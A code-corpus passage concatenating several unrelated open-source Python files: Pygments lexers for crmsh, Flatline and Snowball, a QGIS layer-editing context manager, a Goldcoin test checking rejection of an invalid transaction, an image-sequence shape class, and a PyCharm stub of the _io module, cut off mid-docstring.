(r'\w+', Name.Variable),
(r'[^}:"\'`$]+', Punctuation),
(r':', Punctuation),
include('root'),
],
'paren': [
(r'\)', Keyword, '#pop'),
include('root'),
],
}
class CrmshLexer(RegexLexer):
"""
Lexer for `crmsh <http://crmsh.github.io/>`_ configuration files
for Pacemaker clusters.
.. versionadded:: 2.1
"""
name = 'Crmsh'
aliases = ['crmsh', 'pcmk']
filenames = ['*.crmsh', '*.pcmk']
mimetypes = []
elem = words((
'node', 'primitive', 'group', 'clone', 'ms', 'location',
'colocation', 'order', 'fencing_topology', 'rsc_ticket',
'rsc_template', 'property', 'rsc_defaults',
'op_defaults', 'acl_target', 'acl_group', 'user', 'role',
'tag'), suffix=r'(?![\w#$-])')
sub = words((
'params', 'meta', 'operations', 'op', 'rule',
'attributes', 'utilization'), suffix=r'(?![\w#$-])')
acl = words(('read', 'write', 'deny'), suffix=r'(?![\w#$-])')
bin_rel = words(('and', 'or'), suffix=r'(?![\w#$-])')
un_ops = words(('defined', 'not_defined'), suffix=r'(?![\w#$-])')
date_exp = words(('in_range', 'date', 'spec', 'in'), suffix=r'(?![\w#$-])')
acl_mod = (r'(?:tag|ref|reference|attribute|type|xpath)')
bin_ops = (r'(?:lt|gt|lte|gte|eq|ne)')
val_qual = (r'(?:string|version|number)')
rsc_role_action = (r'(?:Master|Started|Slave|Stopped|'
r'start|promote|demote|stop)')
tokens = {
'root': [
(r'^#.*\n?', Comment),
# attr=value (nvpair)
(r'([\w#$-]+)(=)("(?:""|[^"])*"|\S+)',
bygroups(Name.Attribute, Punctuation, String)),
# need this construct, otherwise numeric node ids
# are matched as scores
# elem id:
(r'(node)(\s+)([\w#$-]+)(:)',
bygroups(Keyword, Whitespace, Name, Punctuation)),
# scores
(r'([+-]?([0-9]+|inf)):', Number),
# keywords (elements and other)
(elem, Keyword),
(sub, Keyword),
(acl, Keyword),
# binary operators
(r'(?:%s:)?(%s)(?![\w#$-])' % (val_qual, bin_ops), Operator.Word),
# other operators
(bin_rel, Operator.Word),
(un_ops, Operator.Word),
(date_exp, Operator.Word),
# builtin attributes (e.g. #uname)
(r'#[a-z]+(?![\w#$-])', Name.Builtin),
# acl_mod:blah
(r'(%s)(:)("(?:""|[^"])*"|\S+)' % acl_mod,
bygroups(Keyword, Punctuation, Name)),
# rsc_id[:(role|action)]
# NB: this matches all other identifiers
(r'([\w#$-]+)(?:(:)(%s))?(?![\w#$-])' % rsc_role_action,
bygroups(Name, Punctuation, Operator.Word)),
# punctuation
(r'(\\(?=\n)|[\[\](){}/:@])', Punctuation),
(r'\s+|\n', Whitespace),
],
}
class FlatlineLexer(RegexLexer):
"""
Lexer for `Flatline <https://github.com/bigmlcom/flatline>`_ expressions.
.. versionadded:: 2.2
"""
name = 'Flatline'
aliases = ['flatline']
filenames = []
mimetypes = ['text/x-flatline']
special_forms = ('let',)
builtins = (
"!=", "*", "+", "-", "<", "<=", "=", ">", ">=", "abs", "acos", "all",
"all-but", "all-with-defaults", "all-with-numeric-default", "and",
"asin", "atan", "avg", "avg-window", "bin-center", "bin-count", "call",
"category-count", "ceil", "cond", "cond-window", "cons", "cos", "cosh",
"count", "diff-window", "div", "ensure-value", "ensure-weighted-value",
"epoch", "epoch-day", "epoch-fields", "epoch-hour", "epoch-millisecond",
"epoch-minute", "epoch-month", "epoch-second", "epoch-weekday",
"epoch-year", "exp", "f", "field", "field-prop", "fields", "filter",
"first", "floor", "head", "if", "in", "integer", "language", "length",
"levenshtein", "linear-regression", "list", "ln", "log", "log10", "map",
"matches", "matches?", "max", "maximum", "md5", "mean", "median", "min",
"minimum", "missing", "missing-count", "missing?", "missing_count",
"mod", "mode", "normalize", "not", "nth", "occurrences", "or",
"percentile", "percentile-label", "population", "population-fraction",
"pow", "preferred", "preferred?", "quantile-label", "rand", "rand-int",
"random-value", "re-quote", "real", "replace", "replace-first", "rest",
"round", "row-number", "segment-label", "sha1", "sha256", "sin", "sinh",
"sqrt", "square", "standard-deviation", "standard_deviation", "str",
"subs", "sum", "sum-squares", "sum-window", "sum_squares", "summary",
"summary-no", "summary-str", "tail", "tan", "tanh", "to-degrees",
"to-radians", "variance", "vectorize", "weighted-random-value", "window",
"winnow", "within-percentiles?", "z-score",
)
valid_name = r'(?!#)[\w!$%*+<=>?/.#-]+'
tokens = {
'root': [
# whitespaces - usually not relevant
(r'[,\s]+', Text),
# numbers
(r'-?\d+\.\d+', Number.Float),
(r'-?\d+', Number.Integer),
(r'0x-?[a-f\d]+', Number.Hex),
# strings, symbols and characters
(r'"(\\\\|\\"|[^"])*"', String),
(r"\\(.|[a-z]+)", String.Char),
# expression template placeholder
(r'_', String.Symbol),
# highlight the special forms
(words(special_forms, suffix=' '), Keyword),
# highlight the builtins
(words(builtins, suffix=' '), Name.Builtin),
# the remaining functions
(r'(?<=\()' + valid_name, Name.Function),
# find the remaining variables
(valid_name, Name.Variable),
# parentheses
(r'(\(|\))', Punctuation),
],
}
class SnowballLexer(ExtendedRegexLexer):
"""
Lexer for `Snowball <http://snowballstem.org/>`_ source code.
.. versionadded:: 2.2
"""
name = 'Snowball'
aliases = ['snowball']
filenames = ['*.sbl']
_ws = r'\n\r\t '
def __init__(self, **options):
self._reset_stringescapes()
ExtendedRegexLexer.__init__(self, **options)
def _reset_stringescapes(self):
self._start = "'"
self._end = "'"
def _string(do_string_first):
def callback(lexer, match, ctx):
s = match.start()
text = match.group()
string = re.compile(r'([^%s]*)(.)' % re.escape(lexer._start)).match
escape = re.compile(r'([^%s]*)(.)' % re.escape(lexer._end)).match
pos = 0
do_string = do_string_first
while pos < len(text):
if do_string:
match = string(text, pos)
yield s + match.start(1), String.Single, match.group(1)
if match.group(2) == "'":
yield s + match.start(2), String.Single, match.group(2)
ctx.stack.pop()
break
yield s + match.start(2), String.Escape, match.group(2)
pos = match.end()
match = escape(text, pos)
yield s + match.start(), String.Escape, match.group()
if match.group(2) != lexer._end:
ctx.stack[-1] = 'escape'
break
pos = match.end()
do_string = True
ctx.pos = s + match.end()
return callback
def _stringescapes(lexer, match, ctx):
lexer._start = match.group(3)
lexer._end = match.group(5)
return bygroups(Keyword.Reserved, Text, String.Escape, Text,
String.Escape)(lexer, match, ctx)
tokens = {
'root': [
(words(('len', 'lenof'), suffix=r'\b'), Operator.Word),
include('root1'),
],
'root1': [
(r'[%s]+' % _ws, Text),
(r'\d+', Number.Integer),
(r"'", String.Single, 'string'),
(r'[()]', Punctuation),
(r'/\*[\w\W]*?\*/', Comment.Multiline),
(r'//.*', Comment.Single),
(r'[!*+\-/<=>]=|[-=]>|<[+-]|[$*+\-/<=>?\[\]]', Operator),
(words(('as', 'get', 'hex', 'among', 'define', 'decimal',
'backwardmode'), suffix=r'\b'),
Keyword.Reserved),
(words(('strings', 'booleans', 'integers', 'routines', 'externals',
'groupings'), suffix=r'\b'),
Keyword.Reserved, 'declaration'),
(words(('do', 'or', 'and', 'for', 'hop', 'non', 'not', 'set', 'try',
'fail', 'goto', 'loop', 'next', 'test', 'true',
'false', 'unset', 'atmark', 'attach', 'delete', 'gopast',
'insert', 'repeat', 'sizeof', 'tomark', 'atleast',
'atlimit', 'reverse', 'setmark', 'tolimit', 'setlimit',
'backwards', 'substring'), suffix=r'\b'),
Operator.Word),
(words(('size', 'limit', 'cursor', 'maxint', 'minint'),
suffix=r'\b'),
Name.Builtin),
(r'(stringdef\b)([%s]*)([^%s]+)' % (_ws, _ws),
bygroups(Keyword.Reserved, Text, String.Escape)),
(r'(stringescapes\b)([%s]*)(.)([%s]*)(.)' % (_ws, _ws),
_stringescapes),
(r'[A-Za-z]\w*', Name),
],
'declaration': [
(r'\)', Punctuation, '#pop'),
(words(('len', 'lenof'), suffix=r'\b'), Name,
('root1', 'declaration')),
include('root1'),
],
'string': [
(r"[^']*'", _string(True)),
],
'escape': [
(r"[^']*'", _string(False)),
],
}
def get_tokens_unprocessed(self, text=None, context=None):
self._reset_stringescapes()
return ExtendedRegexLexer.get_tokens_unprocessed(self, text, context)
| gpl-3.0 |
dgoedkoop/QGIS | python/core/additions/edit.py | 57 | 1528 | # -*- coding: utf-8 -*-
"""
***************************************************************************
edit.py
---------------------
Date : May 2018
Copyright : (C) 2018 by Denis Rouzaud
Email : denis@opengis.ch
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from builtins import object
class QgsEditError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class edit(object):
def __init__(self, layer):
self.layer = layer
def __enter__(self):
assert self.layer.startEditing()
return self.layer
def __exit__(self, ex_type, ex_value, traceback):
if ex_type is None:
if not self.layer.commitChanges():
raise QgsEditError(self.layer.commitErrors())
return True
else:
self.layer.rollBack()
return False
| gpl-2.0 |
goldcoin/Goldcoin-GLD | qa/rpc-tests/invalidtxrequest.py | 2 | 2578 | #!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import ComparisonTestFramework
from test_framework.comptool import TestManager, TestInstance, RejectResult
from test_framework.blocktools import *
import time
'''
In this test we connect to one node over p2p, and test tx requests.
'''
# Use the ComparisonTestFramework with 1 node: only use --testbinary.
class InvalidTxRequestTest(ComparisonTestFramework):
''' Can either run this test as 1 node with expected answers, or two and compare them.
Change the "outcome" variable from each TestInstance object to only do the comparison. '''
def __init__(self):
super().__init__()
self.num_nodes = 1
def run_test(self):
test = TestManager(self, self.options.tmpdir)
test.add_all_connections(self.nodes)
self.tip = None
self.block_time = None
NetworkThread().start() # Start up network handling in another thread
test.run()
def get_tests(self):
if self.tip is None:
self.tip = int("0x" + self.nodes[0].getbestblockhash(), 0)
self.block_time = int(time.time())+1
'''
Create a new block with an anyone-can-spend coinbase
'''
height = 1
block = create_block(self.tip, create_coinbase(height), self.block_time)
self.block_time += 1
block.solve()
# Save the coinbase for later
self.block1 = block
self.tip = block.sha256
height += 1
yield TestInstance([[block, True]])
'''
Now we need that block to mature so we can spend the coinbase.
'''
test = TestInstance(sync_every_block=False)
for i in range(100):
block = create_block(self.tip, create_coinbase(height), self.block_time)
block.solve()
self.tip = block.sha256
self.block_time += 1
test.blocks_and_transactions.append([block, True])
height += 1
yield test
# b'\x64' is OP_NOTIF
# Transaction will be rejected with code 16 (REJECT_INVALID)
tx1 = create_transaction(self.block1.vtx[0], 0, b'\x64', 50 * COIN - 1200000)
yield TestInstance([[tx1, RejectResult(16, b'mandatory-script-verify-flag-failed')]])
# TODO: test further transactions...
if __name__ == '__main__':
InvalidTxRequestTest().main()
| mit |
sujoykroy/motion-picture | editor/MotionPicture/shapes/image_seq_shape.py | 1 | 2120 | from ..commons import *
from .image_shape import ImageShape
import os
from .. import settings as Settings
class ImageSeqShape(ImageShape):
TYPE_NAME = "ImageSeq"
def __init__(self, anchor_at, border_color, border_width, fill_color, width, height, corner_radius):
super(ImageSeqShape, self).__init__(
anchor_at, border_color, border_width,
fill_color, width, height, corner_radius)
self.image_folder = None
self.progress = 0.
def copy(self, copy_name=False, deep_copy=False):
newob = ImageSeqShape(
self.anchor_at.copy(), copy_value(self.border_color), self.border_width,
copy_value(self.fill_color), self.width, self.height, self.corner_radius)
self.copy_into(newob, copy_name)
newob.set_image_folder(self.image_folder)
newob.alpha = self.alpha
return newob
def get_xml_element(self):
elm = super(ImageSeqShape, self).get_xml_element()
del elm.attrib["image_path"]
elm.attrib["image_folder"] = self.image_folder
elm.attrib["alpha"] = "{0}".format(self.alpha)
elm.attrib["progress"] = "{0}".format(self.progress)
return elm
@classmethod
def create_from_xml_element(cls, elm):
shape = super(ImageSeqShape, cls).create_from_xml_element(elm)
shape.alpha = float(elm.attrib.get("alpha", 1.))
shape.progress = float(elm.attrib.get("progress", 0.))
shape.set_image_folder(elm.attrib.get("image_folder", ""))
return shape
def set_image_folder(self, value):
self.image_folder = value
self.set_progress(self.progress)
def set_progress(self, value):
if value <0:
value = 0
value %= 1.0
self.progress = value
image_folder = Settings.Directory.get_full_path(self.image_folder)
if os.path.isdir(image_folder):
files = sorted(os.listdir(image_folder))
index = int(len(files)*self.progress)
self.set_image_path(os.path.join(image_folder, files[index]))
| gpl-3.0 |
mglukhikh/intellij-community | python/testData/MockSdk3.2/python_stubs/_io.py | 64 | 45316 | # encoding: utf-8
# module _io calls itself io
# from (built-in)
# by generator 1.125
"""
The io module provides the Python interfaces to stream handling. The
builtin open function is defined in this module.
At the top of the I/O hierarchy is the abstract base class IOBase. It
defines the basic interface to a stream. Note, however, that there is no
seperation between reading and writing to streams; implementations are
allowed to throw an IOError if they do not support a given operation.
Extending IOBase is RawIOBase which deals simply with the reading and
writing of raw bytes to a stream. FileIO subclasses RawIOBase to provide
an interface to OS files.
BufferedIOBase deals with buffering on a raw byte stream (RawIOBase). Its
subclasses, BufferedWriter, BufferedReader, and BufferedRWPair buffer
streams that are readable, writable, and both respectively.
BufferedRandom provides a buffered interface to random access
streams. BytesIO is a simple stream of in-memory bytes.
Another IOBase subclass, TextIOBase, deals with the encoding and decoding
of streams into text. TextIOWrapper, which extends it, is a buffered text
interface to a buffered raw stream (`BufferedIOBase`). Finally, StringIO
is a in-memory stream for text.
Argument names are not part of the specification, and only the arguments
of open() are intended to be used as keyword arguments.
data:
DEFAULT_BUFFER_SIZE
An int containing the default buffer size used by the module's buffered
I/O classes. open() uses the file's blksize (as obtained by os.stat) if
possible.
"""
# no imports
# Variables with simple values
DEFAULT_BUFFER_SIZE = 8192
# functions
def open(name, mode=None, buffering=None): # known case of _io.open
"""
open(file, mode='r', buffering=-1, encoding=None,
errors=None, newline=None, closefd=True) -> file object
Open file and return a stream. Raise IOError upon failure.
file is either a text or byte string giving the name (and the path
if the file isn't in the current working directory) of the file to
be opened or an integer file descriptor of the file to be
wrapped. (If a file descriptor is given, it is closed when the
returned I/O object is closed, unless closefd is set to False.)
mode is an optional string that specifies the mode in which the file
is opened. It defaults to 'r' which means open for reading in text
mode. Other common values are 'w' for writing (truncating the file if
it already exists), and 'a' for appending (which on some Unix systems,
means that all writes append to the end of the file regardless of the
current seek position). In text mode, if encoding is not specified the
encoding used is platform dependent. (For reading and writing raw
bytes use binary mode and leave encoding unspecified.) The available
modes are:
========= ===============================================================
Character Meaning
--------- ---------------------------------------------------------------
'r' open for reading (default)
'w' open for writing, truncating the file first
'a' open for writing, appending to the end of the file if it exists
'b' binary mode
't' text mode (default)
'+' open a disk file for updating (reading and writing)
'U' universal newline mode (for backwards compatibility; unneeded
for new code)
========= ===============================================================
The default mode is 'rt' (open for reading text). For binary random
access, the mode 'w+b' opens and truncates the file to 0 bytes, while
'r+b' opens the file without truncation.
Python distinguishes between files opened in binary and text modes,
even when the underlying operating system doesn't. Files opened in
binary mode (appending 'b' to the mode argument) return contents as
bytes objects without any decoding. In text mode (the default, or when
't' is appended to the mode argument), the contents of the file are
returned as strings, the bytes having been first decoded using a
platform-dependent encoding or using the specified encoding if given.
buffering is an optional integer used to set the buffering policy.
Pass 0 to switch buffering off (only allowed in binary mode), 1 to select
line buffering (only usable in text mode), and an integer > 1 to indicate
the size of a fixed-size chunk buffer. When no buffering argument is
given, the default buffering policy works as follows:
* Binary files are buffered in fixed-size chunks; the size of the buffer
is chosen using a heuristic trying to determine the underlying device's
"block size" and falling back on `io.DEFAULT_BUFFER_SIZE`.
On many systems, the buffer will typically be 4096 or 8192 bytes long.
* "Interactive" text files (files for which isatty() returns True)
use line buffering. Other text files use the policy described above
for binary files.
encoding is the name of the encoding used to decode or encode the
file. This should only be used in text mode. The default encoding is
platform dependent, but any encoding supported by Python can be
passed. See the codecs module for the list of supported encodings.
errors is an optional string that specifies how encoding errors are to
be handled---this argument should not be used in binary mode. Pass
'strict' to raise a ValueError exception if there is an encoding error
(the default of None has the same effect), or pass 'ignore' to ignore
errors. (Note that ignoring encoding errors can lead to data loss.)
See the documentation for codecs.register for a list of the permitted
encoding error strings.
newline controls how universal newlines works (it only applies to text
mode). It can be None, '', '\n', '\r', and '\r\n'. It works as
follows:
* On input, if newline is None, universal newlines mode is
enabled. Lines in the input can end in '\n', '\r', or '\r\n', and
these are translated into '\n' before being returned to the
caller. If it is '', universal newline mode is enabled, but line
endings are returned to the caller untranslated. If it has any of
the other legal values, input lines are only terminated by the given
string, and the line ending is returned to the caller untranslated.
* On output, if newline is None, any '\n' characters written are
translated to the system default line separator, os.linesep. If
newline is '', no translation takes place. If newline is any of the
other legal values, any '\n' characters written are translated to
the given string.
If closefd is False, the underlying file descriptor will be kept open
when the file is closed. This does not work when a file name is given
and must be True in that case.
open() returns a file object whose type depends on the mode, and
through which the standard file operations such as reading and writing
are performed. When open() is used to open a file in a text mode ('w',
'r', 'wt', 'rt', etc.), it returns a TextIOWrapper. When used to open
a file in a binary mode, the returned class varies: in read binary
mode, it returns a BufferedReader; in write binary and append binary
modes, it returns a BufferedWriter, and in read/write mode, it returns
a BufferedRandom.
It is also possible to use a string or bytearray as a file for both
reading and writing. For strings StringIO can be used like a file
opened in a text mode, and for bytes a BytesIO can be used like a file
opened in a binary mode.
"""
return file('/dev/null')
# classes
class BlockingIOError(IOError):
""" Exception raised when I/O would block on a non-blocking I/O stream """
def __init__(self, *args, **kwargs): # real signature unknown
pass
characters_written = property(lambda self: object()) # default
class _IOBase(object):
"""
The abstract base class for all I/O classes, acting on streams of
bytes. There is no public constructor.
This class provides dummy implementations for many methods that
derived classes can override selectively; the default implementations
represent a file that cannot be read, written or seeked.
Even though IOBase does not declare read, readinto, or write because
their signatures will vary, implementations and clients should
consider those methods part of the interface. Also, implementations
may raise UnsupportedOperation when operations they do not support are
called.
The basic type used for binary data read from or written to a file is
bytes. bytearrays are accepted too, and in some cases (such as
readinto) needed. Text I/O classes work with str data.
Note that calling any method (even inquiries) on a closed stream is
undefined. Implementations may raise IOError in this case.
IOBase (and its subclasses) support the iterator protocol, meaning
that an IOBase object can be iterated over yielding the lines in a
stream.
IOBase also supports the :keyword:`with` statement. In this example,
fp is closed after the suite of the with statement is complete:
with open('spam.txt', 'r') as fp:
fp.write('Spam and eggs!')
"""
def close(self, *args, **kwargs): # real signature unknown
"""
Flush and close the IO object.
This method has no effect if the file is already closed.
"""
pass
def fileno(self, *args, **kwargs): # real signature unknown
"""
Returns underlying file descriptor if one exists.
An IOError is raised if the IO object does not use a file descriptor.
"""
pass
def flush(self, *args, **kwargs): # real signature unknown
"""
Flush write buffers, if applicable.
This is not implemented for read-only and non-blocking streams.
"""
pass
def isatty(self, *args, **kwargs): # real signature unknown
"""
Return whether this is an 'interactive' stream.
Return False if it can't be determined.
"""
pass
def readable(self, *args, **kwargs): # real signature unknown
"""
Return whether object was opened for reading.
If False, read() will raise UnsupportedOperation.
"""
pass
def readline(self, *args, **kwargs): # real signature unknown
"""
Read and return a line from the stream.
If limit is specified, at most limit bytes will be read.
The line terminator is always b'
' for binary files; for text
files, the newlines argument to open can be used to select the line
terminator(s) recognized.
"""
pass
def readlines(self, *args, **kwargs): # real signature unknown
"""
Return a list of lines from the stream.
hint can be specified to control the number of lines read: no more
lines will be read if the total size (in bytes/characters) of all
lines so far exceeds hint.
"""
pass
def seek(self, *args, **kwargs): # real signature unknown
"""
Change stream position.
Change the stream position to byte offset offset. offset is
interpreted relative to the position indicated by whence. Values
for whence are:
* 0 -- start of stream (the default); offset should be zero or positive
* 1 -- current stream position; offset may be negative
* 2 -- end of stream; offset is usually negative
Return the new absolute position.
"""
pass
def seekable(self, *args, **kwargs): # real signature unknown
"""
Return whether object supports random access.
If False, seek(), tell() and truncate() will raise UnsupportedOperation.
This method may need to do a test seek().
"""
pass
def tell(self, *args, **kwargs): # real signature unknown
""" Return current stream position. """
pass
def truncate(self, *args, **kwargs): # real signature unknown
"""
Truncate file to size bytes.
File pointer is left unchanged. Size defaults to the current IO
position as reported by tell(). Returns the new size.
"""
pass
def writable(self, *args, **kwargs): # real signature unknown
"""
Return whether object was opened for writing.
If False, write() will raise UnsupportedOperation.
"""
pass
def writelines(self, *args, **kwargs): # real signature unknown
pass
def _checkClosed(self, *args, **kwargs): # real signature unknown
pass
def _checkReadable(self, *args, **kwargs): # real signature unknown
pass
def _checkSeekable(self, *args, **kwargs): # real signature unknown
pass
def _checkWritable(self, *args, **kwargs): # real signature unknown
pass
def __enter__(self, *args, **kwargs): # real signature unknown
pass
def __exit__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
def __iter__(self): # real signature unknown; restored from __doc__
""" x.__iter__() <==> iter(x) """
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __next__(self): # real signature unknown; restored from __doc__
""" x.__next__() <==> next(x) """
pass
closed = property(lambda self: object()) # default
class _BufferedIOBase(_IOBase):
"""
Base class for buffered IO objects.
The main difference with RawIOBase is that the read() method
supports omitting the size argument, and does not have a default
implementation that defers to readinto().
In addition, read(), readinto() and write() may raise
BlockingIOError if the underlying raw stream is in non-blocking
mode and not ready; unlike their raw counterparts, they will never
return None.
A typical implementation should not inherit from a RawIOBase
implementation, but wrap one.
"""
def detach(self, *args, **kwargs): # real signature unknown
"""
Disconnect this buffer from its underlying raw stream and return it.
After the raw stream has been detached, the buffer is in an unusable
state.
"""
pass
def read(self, *args, **kwargs): # real signature unknown
"""
Read and return up to n bytes.
If the argument is omitted, None, or negative, reads and
returns all data until EOF.
If the argument is positive, and the underlying raw stream is
not 'interactive', multiple raw reads may be issued to satisfy
the byte count (unless EOF is reached first). But for
interactive raw streams (as well as sockets and pipes), at most
one raw read will be issued, and a short result does not imply
that EOF is imminent.
Returns an empty bytes object on EOF.
Returns None if the underlying raw stream was open in non-blocking
mode and no data is available at the moment.
"""
pass
def read1(self, *args, **kwargs): # real signature unknown
"""
Read and return up to n bytes, with at most one read() call
to the underlying raw stream. A short result does not imply
that EOF is imminent.
Returns an empty bytes object on EOF.
"""
pass
def readinto(self, *args, **kwargs): # real signature unknown
pass
def write(self, *args, **kwargs): # real signature unknown
"""
Write the given buffer to the IO stream.
Returns the number of bytes written, which is never less than
len(b).
Raises BlockingIOError if the buffer is full and the
underlying raw stream cannot accept more data at the moment.
"""
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
class BufferedRandom(_BufferedIOBase):
"""
A buffered interface to random access streams.
The constructor creates a reader and writer for a seekable stream,
raw, given in the first argument. If the buffer_size is omitted it
defaults to DEFAULT_BUFFER_SIZE. max_buffer_size isn't used anymore.
"""
def close(self, *args, **kwargs): # real signature unknown
pass
def detach(self, *args, **kwargs): # real signature unknown
pass
def fileno(self, *args, **kwargs): # real signature unknown
pass
def flush(self, *args, **kwargs): # real signature unknown
pass
def isatty(self, *args, **kwargs): # real signature unknown
pass
def peek(self, *args, **kwargs): # real signature unknown
pass
def read(self, *args, **kwargs): # real signature unknown
pass
def read1(self, *args, **kwargs): # real signature unknown
pass
def readable(self, *args, **kwargs): # real signature unknown
pass
def readinto(self, *args, **kwargs): # real signature unknown
pass
def readline(self, *args, **kwargs): # real signature unknown
pass
def seek(self, *args, **kwargs): # real signature unknown
pass
def seekable(self, *args, **kwargs): # real signature unknown
pass
def tell(self, *args, **kwargs): # real signature unknown
pass
def truncate(self, *args, **kwargs): # real signature unknown
pass
def writable(self, *args, **kwargs): # real signature unknown
pass
def write(self, *args, **kwargs): # real signature unknown
pass
def _dealloc_warn(self, *args, **kwargs): # real signature unknown
pass
def __getstate__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __next__(self): # real signature unknown; restored from __doc__
""" x.__next__() <==> next(x) """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
closed = property(lambda self: object()) # default
mode = property(lambda self: object()) # default
name = property(lambda self: object()) # default
raw = property(lambda self: object()) # default
class BufferedReader(_BufferedIOBase):
""" Create a new buffered reader using the given readable raw IO object. """
def close(self, *args, **kwargs): # real signature unknown
pass
def detach(self, *args, **kwargs): # real signature unknown
pass
def fileno(self, *args, **kwargs): # real signature unknown
pass
def flush(self, *args, **kwargs): # real signature unknown
pass
def isatty(self, *args, **kwargs): # real signature unknown
pass
def peek(self, *args, **kwargs): # real signature unknown
pass
def read(self, *args, **kwargs): # real signature unknown
pass
def read1(self, *args, **kwargs): # real signature unknown
pass
def readable(self, *args, **kwargs): # real signature unknown
pass
def readline(self, *args, **kwargs): # real signature unknown
pass
def seek(self, *args, **kwargs): # real signature unknown
pass
def seekable(self, *args, **kwargs): # real signature unknown
pass
def tell(self, *args, **kwargs): # real signature unknown
pass
def truncate(self, *args, **kwargs): # real signature unknown
pass
def writable(self, *args, **kwargs): # real signature unknown
pass
def _dealloc_warn(self, *args, **kwargs): # real signature unknown
pass
def __getstate__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __next__(self): # real signature unknown; restored from __doc__
""" x.__next__() <==> next(x) """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
closed = property(lambda self: object()) # default
mode = property(lambda self: object()) # default
name = property(lambda self: object()) # default
raw = property(lambda self: object()) # default
class BufferedRWPair(_BufferedIOBase):
"""
A buffered reader and writer object together.
A buffered reader object and buffered writer object put together to
form a sequential IO object that can read and write. This is typically
used with a socket or two-way pipe.
reader and writer are RawIOBase objects that are readable and
writeable respectively. If the buffer_size is omitted it defaults to
DEFAULT_BUFFER_SIZE.
"""
def close(self, *args, **kwargs): # real signature unknown
pass
def flush(self, *args, **kwargs): # real signature unknown
pass
def isatty(self, *args, **kwargs): # real signature unknown
pass
def peek(self, *args, **kwargs): # real signature unknown
pass
def read(self, *args, **kwargs): # real signature unknown
pass
def read1(self, *args, **kwargs): # real signature unknown
pass
def readable(self, *args, **kwargs): # real signature unknown
pass
def readinto(self, *args, **kwargs): # real signature unknown
pass
def writable(self, *args, **kwargs): # real signature unknown
pass
def write(self, *args, **kwargs): # real signature unknown
pass
def __getstate__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
closed = property(lambda self: object()) # default
class BufferedWriter(_BufferedIOBase):
"""
A buffer for a writeable sequential RawIO object.
The constructor creates a BufferedWriter for the given writeable raw
stream. If the buffer_size is not given, it defaults to
DEFAULT_BUFFER_SIZE. max_buffer_size isn't used anymore.
"""
def close(self, *args, **kwargs): # real signature unknown
pass
def detach(self, *args, **kwargs): # real signature unknown
pass
def fileno(self, *args, **kwargs): # real signature unknown
pass
def flush(self, *args, **kwargs): # real signature unknown
pass
def isatty(self, *args, **kwargs): # real signature unknown
pass
def readable(self, *args, **kwargs): # real signature unknown
pass
def seek(self, *args, **kwargs): # real signature unknown
pass
def seekable(self, *args, **kwargs): # real signature unknown
pass
def tell(self, *args, **kwargs): # real signature unknown
pass
def truncate(self, *args, **kwargs): # real signature unknown
pass
def writable(self, *args, **kwargs): # real signature unknown
pass
def write(self, *args, **kwargs): # real signature unknown
pass
def _dealloc_warn(self, *args, **kwargs): # real signature unknown
pass
def __getstate__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
closed = property(lambda self: object()) # default
mode = property(lambda self: object()) # default
name = property(lambda self: object()) # default
raw = property(lambda self: object()) # default
class BytesIO(_BufferedIOBase):
"""
BytesIO([buffer]) -> object
Create a buffered I/O implementation using an in-memory bytes
buffer, ready for reading and writing.
"""
def close(self): # real signature unknown; restored from __doc__
""" close() -> None. Disable all I/O operations. """
pass
def flush(self): # real signature unknown; restored from __doc__
""" flush() -> None. Does nothing. """
pass
def getbuffer(self): # real signature unknown; restored from __doc__
"""
getbuffer() -> bytes.
Get a read-write view over the contents of the BytesIO object.
"""
pass
def getvalue(self): # real signature unknown; restored from __doc__
"""
getvalue() -> bytes.
Retrieve the entire contents of the BytesIO object.
"""
pass
def isatty(self): # real signature unknown; restored from __doc__
"""
isatty() -> False.
Always returns False since BytesIO objects are not connected
to a tty-like device.
"""
pass
def read(self, size=None): # real signature unknown; restored from __doc__
"""
read([size]) -> read at most size bytes, returned as a string.
If the size argument is negative, read until EOF is reached.
Return an empty string at EOF.
"""
pass
def read1(self, size): # real signature unknown; restored from __doc__
"""
read1(size) -> read at most size bytes, returned as a string.
If the size argument is negative or omitted, read until EOF is reached.
Return an empty string at EOF.
"""
pass
def readable(self, *args, **kwargs): # real signature unknown
pass
def readinto(self, bytearray): # real signature unknown; restored from __doc__
"""
readinto(bytearray) -> int. Read up to len(b) bytes into b.
Returns number of bytes read (0 for EOF), or None if the object
is set not to block as has no data to read.
"""
pass
def readline(self, size=None): # real signature unknown; restored from __doc__
"""
readline([size]) -> next line from the file, as a string.
Retain newline. A non-negative size argument limits the maximum
number of bytes to return (an incomplete line may be returned then).
Return an empty string at EOF.
"""
pass
def readlines(self, size=None): # real signature unknown; restored from __doc__
"""
